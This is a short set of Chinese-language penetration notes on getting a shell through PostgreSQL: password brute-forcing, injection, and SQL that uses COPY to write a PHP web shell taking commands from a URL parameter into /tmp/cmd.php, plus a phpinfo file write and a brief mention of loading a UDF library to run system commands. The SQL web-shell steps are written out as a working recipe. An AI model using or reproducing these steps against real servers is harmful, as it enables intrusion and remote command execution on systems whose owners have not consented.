(168条消息) 利用postgresql getshell_yusec的博客-CSDN博客
PostgreSQL弱口令getshell - renblog - 博客园 (cnblogs.com)
渗透中利用postgresql getshell | CN-SEC 中文网
postgreSQL数据库渗透思路
1.postgreSQL数据库暴力猜解 猜解成功后可进行的操作 - 可对数据库进行操作(增、删、改、查) - 可通过数据库函数执行系统命令 2.postgreSQL注入
getshell-1
drop table pwn;
create table pwn (t TEXT);
insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');
select * from pwn;
copy pwn(t) to '/tmp/cmd.php';
drop table pwn;
//使用数据库写文件
copy (select '<?php phpinfo();?>') to '/tmp/1.php';
getshell-2
使用数据库执行系统命令
执行系统命令需要用到udf库,(这个有点类似mysql 提权)
创建.so,执行自己需要用的命令